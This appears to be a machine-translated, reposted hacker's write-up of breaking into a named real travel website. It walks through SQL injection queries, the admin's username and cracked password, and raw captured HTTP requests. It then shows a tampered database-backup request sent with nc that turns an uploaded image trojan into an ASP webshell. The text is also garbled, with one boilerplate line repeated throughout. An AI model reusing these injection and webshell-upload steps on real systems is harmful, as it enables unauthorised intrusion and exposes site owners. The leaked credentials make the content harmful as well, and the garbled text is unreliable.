This is an article I wrote before in the green corps. It was originally written by myself. I learned from a t00ls article and made improvements. The name of my account in the green corps is also leisureforest.
There is no doubt about the authenticity. Thanks
Database packet capture alternative backup
Address http://www.bkjia.com/(used only to replace the target website, not this site)
Database packet capture alternative backup
It is also a travel network. I just published an article about leaving. It's raining outside. It is really idle. Write this article to mention my popularity.
Database packet capture alternative backup
This address was sent to me by a guy who told me to give it a try. I found a link to the http://www.kmholiday.com/Travel/Travel_line_view.asp? Lineid = 1030 'with a special character, an error message is returned immediately.
Database packet capture alternative backup
Microsoft JET Database Engine
Database packet capture alternative backup
Error '80040e14'
Syntax error (operator loss) in the query expression 'id = 1030.
Database packet capture alternative backup
/Travel/Travel_line_view.asp, row 41
Database packet capture alternative backup
Database packet capture alternative backup
What do you mean. It is not clear that I will engage him. Access database, directly on the statement, and exists (select * from msysobjects)
Database packet capture alternative backup
Database packet capture alternative backup
Microsoft JET Database Engine
Database packet capture alternative backup
Error '80040e09'
Database packet capture alternative backup
Records cannot be read. You do not have the permission to read data on 'msysobjects.
Database packet capture alternative backup
/Travel/Travel_line_view.asp, row 41
Database packet capture alternative backup
This table exists but cannot be accessed. OK. Then execute and exists (select * from admin) on the normal page. There is an admin table ---- handsome.
Database packet capture alternative backup
And exists (select count (user) from admin) or normal page with user Field
Database packet capture alternative backup
And exists (select count (psw from admin) normal page, password field.
Database packet capture alternative backup
Username aidy password 28B9E7A5FADBDB964E9069BC82AC2AF9 32-bit encryption, scared me. I went to MD5 to get it done, and my grandmother sweated 19850311. At this moment, I sent a message to the person. This is too simple. What should I do? He said, it is only possible to get the shell. Let's proceed.
Database packet capture alternative backup
Looking for the backend is really difficult for me. First go to the tool and scan more than 40 thousand shards. In fact, in this case, he must have a directory that is very difficult to solve. What should I do? google, I used several statements and only found two login pages, but none of them were correct. Go back to the homepage to view the image, but right-click the image and choose not to view attributes. The address shown in Thunder during the last download. I have a solution. Haha ......
Database packet capture alternative backup
On this page, go to http://www.kmholiday.com/adminsheeninfo/directly.
Database packet capture alternative backup
Database Backup was found. I first found an upload file and uploaded an image Trojan while I was busy backing up the file. The original backup path could not be modified. That is to say, you can only back up mdb database files, and the file name after the backup is asa. This is no problem. iis can be parsed. The key is that the path is not moved. This is hard for me. What should I do. Right-click to view the source code. Found this link
Database packet capture alternative backup
Http://www.bkjia.com/adminsheeninfo/Oledit/ewebeditor/Khan, and editor, Editor Ah editor, and you, do not want to engage in, enter the editor, login page is not deleted. Now I have been deleted while writing an article. I know who deleted it (not me. Enter the username and password. Find the style management, and the original style Save button is deleted, so that it is safe. Then I copied a style and added the asp format to the newly created style. Asa. But they didn't succeed. In fact, it would be enough to add aaspsp here, but I didn't expect him to have such a stupid vulnerability. Won't I get the shell. Impossible.
Database packet capture alternative backup
So I finally thought about a Trojan horse. Later I saw someone think of this method two years ago. I just inserted a news packet into the news and changed the news content to my own sentence.
Database packet capture alternative backup
The packet capture content is as follows:
Database packet capture alternative backup
POST/adminsheeninfo/Oledit/Upload. asp? Action = remote & type = remote & style = s_light HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd. ms-excel, application/vnd. ms-powerpoint, application/msword, application/QVOD, application/QVOD ,*/*
Referer: http://www.kmholiday.com/adminsh... s & style = s_light
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.kmholiday.com
Content-Length: 33
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: Maid = 1312255680031; maid = 0; ASPSESSIONIDSQQSDTTT = PNFACNHDBNBMAFNBNHHHBFCP
Database packet capture alternative backup
EWebEditor_UploadText = ggggggggggg saw that at last the content was not captured, but the path was not captured.
Database packet capture alternative backup
It seems that this is really hard to do. At this time, I still want to use the back-end backup. In fact, since we can capture packets in the back-end, we can also capture packets. Just do it.
Database packet capture alternative backup
Click back-end database backup. The captured content is as follows:
Database packet capture alternative backup
POST/adminsheeninfo/DB_Manage.asp? Action = BackupData & amp; act = Backup HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd. ms-excel, application/vnd. ms-powerpoint, application/msword, application/QVOD, application/QVOD ,*/*
Referer: http://www.kmholiday.com/adminsh... p? Action = BackupData
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.kmholiday.com
Content-Length: 162
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: Maid = 1312255680031; maid = 0; ASPSESSIONIDSQQSDTTT = PNFACNHDBNBMAFNBNHHHBFCP
Database packet capture alternative backup
DBpath = % 2 Fadminsheeninfo % 2Fdb % 2Fweb_date _ % 23_sheenzhaoghsy % 26% 23 @ % 21.mdb& bkfolder = .. % 2F .. % 2 Fdatabase % 2 FDataBackup % 2F & bkDBname = DB_BAK_20110802_1201247.asa & bknotes =
Database packet capture alternative backup
We don't see this link at the end. What does this mean? Let's analyze it first. DBpath = % 2 Fadminsheeninfo % 2Fdb % 2Fweb_date _ % 23_sheenzhaoghsy % 26% 23 @ % 21. mdb is the original database name, % 23 is a space, % 2f is the encoding of/, after conversion is/adminsheeninfo/db/web_date _ # _ sheenzhaoghsy &#@!. The database name after mdb backup is = .. % 2F .. % 2 Fdatabase % 2 FDataBackup % 2F & bkDBname we want to change the original database name to the uploaded image horse, for example, 12:07:04. jpg, I can write it at will. Change the original database path to this, and then count the character length of the original database path. For example, if it is 162 (Suppose), I will not count it, I remember that the number was 153, the image was 64, and then the original Content-Length: 162was changed to 153 With-64 = 89, and the file name was saved as qq.txt. Save as a txt document. Copy to the c-drive root directory
Database packet capture alternative backup
Upload with nc (nc should also be placed in the c root directory)
Database packet capture alternative backup
Command nc www.kmholiday.com 80 <qq.txt. After the upload, a message indicating successful upload is returned. As follows:
Database packet capture alternative backup
20172fadminsheeninfo%2foledit%2fuploadfile%2f2011730232015138.jpg 62
The database has been backed up successfully. The path of your database is \ hosting \ wwwroot \ kmholiday_cn \ htdocs \ adminsh eeninfo \.../database/DataBackup/\ db_bak_20151130_231235.asa...
Database/DataBackup/\ db_bak_20151130_231235.asa
Database packet capture alternative backup
This is the Asp horse address after the backup D: \ hosting \ wwwroot \ kmholiday_cn \ htdocs \ adminsh eeninfo \.. /.. /database/DataBackup/\ db_bak_20151130_231235.asa can be connected with the chivalrous customer service end, and then uploaded to your own asp MM for access. No more, which is not good for you.
Database packet capture alternative backup
Well, it seems that simple things are not so easy to get. It's better to do things in a down-to-earth Manner like me.
Database packet capture alternative backup
By 9149727@qq.com